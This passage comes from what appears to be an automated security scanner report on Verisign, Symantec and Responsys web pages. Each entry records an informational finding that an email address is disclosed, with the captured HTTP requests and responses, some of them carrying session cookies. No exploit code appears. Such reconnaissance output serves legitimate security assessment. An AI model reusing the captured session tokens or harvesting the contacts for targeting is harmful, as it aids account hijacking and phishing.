Content-Length: 6532
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a name="header-email" target="_top" href="mailto:vip-support@verisign.com">
...[SNIP]...

17.11. https://idprotect.verisign.com/toolbar/home.v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/toolbar/home.v

Issue detail

The following email address was disclosed in the response:

vip-support@verisign.com

Request

GET /toolbar/home.v HTTP/1.1
Host: idprotect.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:02 GMT
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a name="header-email" target="_top" href="mailto:vip-support@verisign.com">
...[SNIP]...

17.12. https://idprotect.verisign.com/toolbar/install.v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/toolbar/install.v

Issue detail

The following email address was disclosed in the response:

vip-support@verisign.com

Request

GET /toolbar/install.v HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/download.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:40 GMT
Content-Type: text/html
Content-Length: 6820
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a name="header-email" target="_top" href="mailto:vip-support@verisign.com">
...[SNIP]...

17.13. https://idprotect.verisign.com/wheretouse.v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/wheretouse.v

Issue detail

The following email address was disclosed in the response:

vip-support@verisign.com

Request

GET /wheretouse.v HTTP/1.1
Host: idprotect.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.14. https://knowledge.verisign.ch/support/code-signing-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/code-signing-support/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.15. https://knowledge.verisign.ch/support/digital-id-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/digital-id-support/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

GET /support/digital-id-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.16. https://knowledge.verisign.ch/support/mpki-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/mpki-support/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index

Issue detail

The following email addresses were disclosed in the response:

channel-partners@verisign.com
support@verisign.ch

Request

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...
<a target="_blank" href="javascript:location.href='mailto:'+String.fromCharCode(115,117,112,112,111,114,116,64,118,101,114,105,115,105,103,110,46,99,104)+'?'">support@verisign.ch</a>
...[SNIP]...
<a href="javascript:location.href='mailto:'+String.fromCharCode(115,117,112,112,111,114,116,64,118,101,114,105,115,105,103,110,46,99,104)+'?'">support@verisign.ch</a>
...[SNIP]...

17.18. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.19. https://knowledge.verisign.ch/support/trust-seal-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/trust-seal-support/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.20. https://knowledge.verisign.com/apps/infocenter/sites/verisign/js/jquery.hover_intent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/apps/infocenter/sites/verisign/js/jquery.hover_intent.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /apps/infocenter/sites/verisign/js/jquery.hover_intent.js HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621614|session#1315621455064-973488#1315623414|PC#1315621455064-973488.19#1378693554; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=44BE2FA4819F216406CBA2DF030D4F7C

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:29 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT
ETag: "34cc8-64e-4aac5f440a880"
Accept-Ranges: bytes
Content-Length: 1614
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: application/x-javascript

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

17.21. https://knowledge.verisign.com/support/code-signing-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/code-signing-support/index

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.22. https://knowledge.verisign.com/support/code-signing-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/code-signing-support/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.23. https://knowledge.verisign.com/support/digital-id-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/digital-id-support/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.24. https://knowledge.verisign.com/support/eca-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/eca-support/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

GET /support/eca-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js

Issue detail

The following email addresses were disclosed in the response:

joshs@santsys.com
jsantomieri@verisign.com

Request

GET /support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623558|PC#1315621455064-973488.19#1378693698|check#true#1315621758

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:52 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT
ETag: "345a8-71a-4aac5f440a880"
Accept-Ranges: bytes
Content-Length: 1818
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: application/x-javascript

.../*
InstantService Smart Button Integration
VeriSign, Inc
Developer: Josh Santomieri (jsantomieri@verisign.com, joshs@santsys.com)
Date: 1/8/2010

Requirements:
This script requires jQuery (http://www.jquery.com).
*/

function SmartButtonHandler() {

   var self = this;

   this.parse = function() {
       $('div[type
...[SNIP]...

17.26. https://knowledge.verisign.com/support/mpki-for-ssl-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/mpki-for-ssl-support/index

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.27. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/mpki-for-ssl-support/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

GET /support/mpki-for-ssl-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:45:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.28. https://knowledge.verisign.com/support/mpki-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/mpki-support/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.29. https://knowledge.verisign.com/support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js

Issue detail

The following email addresses were disclosed in the response:

joshs@santsys.com
jsantomieri@verisign.com

Request

GET /support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: https://knowledge.verisign.com/support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621614|session#1315621455064-973488#1315623414|PC#1315621455064-973488.19#1378693554; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=0BA75884D1245C296CF5414E376DC3FC

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:34 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT
ETag: "345a8-71a-4aac5f440a880"
Accept-Ranges: bytes
Content-Length: 1818
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: application/x-javascript

.../*
InstantService Smart Button Integration
VeriSign, Inc
Developer: Josh Santomieri (jsantomieri@verisign.com, joshs@santsys.com)
Date: 1/8/2010

Requirements:
This script requires jQuery (http://www.jquery.com).
*/

function SmartButtonHandler() {

   var self = this;

   this.parse = function() {
       $('div[type
...[SNIP]...

17.30. https://knowledge.verisign.com/support/ssl-certificates-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/ssl-certificates-support/index

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

Response

17.31. https://knowledge.verisign.com/support/ssl-certificates-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/ssl-certificates-support/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.32. https://knowledge.verisign.com/support/trust-seal-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/trust-seal-support/index.html

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.33. http://partnerlocator.symantec.com/static/prod_plocator_s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://partnerlocator.symantec.com
Path:	/static/prod_plocator_s_code.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /static/prod_plocator_s_code.js HTTP/1.1
Host: partnerlocator.symantec.com
Proxy-Connection: keep-alive
Referer: http://partnerlocator.symantec.com/public/search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%2526rmkr-symlrc-cust-prod%253D%252526pid%25253DsymRen%2525253ALRC%2525253ARenewals%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:37:41 GMT
Content-Type: application/x-javascript
Content-Length: 28714
Last-Modified: Fri, 02 Jul 2010 19:50:45 GMT
Connection: keep-alive
Accept-Ranges: bytes

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="symanteccom,veritasnonconsumer,symantecpartner"
var s=s_
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

17.34. https://policy3.responsys.net/privacy.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://policy3.responsys.net
Path:	/privacy.htm

Issue detail

The following email address was disclosed in the response:

privacy@responsys.com

Request

GET /privacy.htm HTTP/1.1
Host: policy3.responsys.net
Connection: keep-alive
Referer: https://policy3.responsys.net/permission.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:40:06 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 07:38:58 GMT
ETag: "1f21312-1bfd-486ed8d030880"
Accept-Ranges: bytes
Content-Length: 7165
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Responsys Privacy Policy</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
</head>

...[SNIP]...
<a href="mailto:privacy@responsys.com">privacy@responsys.com</a>
...[SNIP]...
<a href="mailto:privacy@responsys.com">privacy@responsys.com</a>
...[SNIP]...

17.35. https://press.verisign.com/easyir/customrel.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://press.verisign.com
Path:	/easyir/customrel.do

Issue detail

The following email address was disclosed in the response:

support@marketwire.com

Request

GET /easyir/customrel.do HTTP/1.1
Host: press.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Servlet/3.0; JBossAS-6
Content-Length: 1286
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
       <!-- so that relative references will use absolute url from jsp
                   and not from calling
...[SNIP]...
<b>support@marketwire.com</b>
...[SNIP]...

17.36. http://query.verisign.ch/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://query.verisign.ch
Path:	/search

Issue detail

The following email address was disclosed in the response:

channel-partners@verisign.com

Request

GET /search HTTP/1.1
Host: query.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.37. http://query.verisign.com/cluster.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://query.verisign.com
Path:	/cluster.js

Issue detail

The following email address was disclosed in the response:

dspencer@google.com

Request

GET /cluster.js HTTP/1.1
Host: query.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:45 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT
Content-Length: 8783
Cache-Control: public, max-age=31622400
Expires: Sun, 09 Sep 2012 21:24:45 GMT
Vary: Accept-Encoding

// Copyright 2006 Google Inc., All Rights Reserved
// dspencer@google.com

/**
* @fileoverview
*
* This file is for the rendering of Clustered Search results
* on the GSA.
*
*
* The flow is:
*
* - User initiates search query and wants clustered results
*
* - Res
...[SNIP]...
* Tested under:
* Firefox 1.5.0.7 (Linux)
* Firefox 1.5.0.7 (WinXP)
* Firefox 1.5.0.4 (Mac OS X 10.4.7)
*
* IE 6.0... (WinXP SP2)
*
* Safari (Mac OS X 10.4.7)
*
* @author dspencer@google.com
*
* @requires common.js
* @requires xmlthtp.js
* @requires uri.js
*/

/**
* Name of conceptual clustering servlet in
* servlet array in JSON dictionary.
*/
var CS_CONCEPTS_NAME = 'Concepts';

...[SNIP]...

17.38. http://query.verisign.com/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://query.verisign.com
Path:	/common.js

Issue detail

The following email address was disclosed in the response:

jlim@google.com

Request

GET /common.js HTTP/1.1
Host: query.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:45 GMT
Content-Type: application/x-javascript
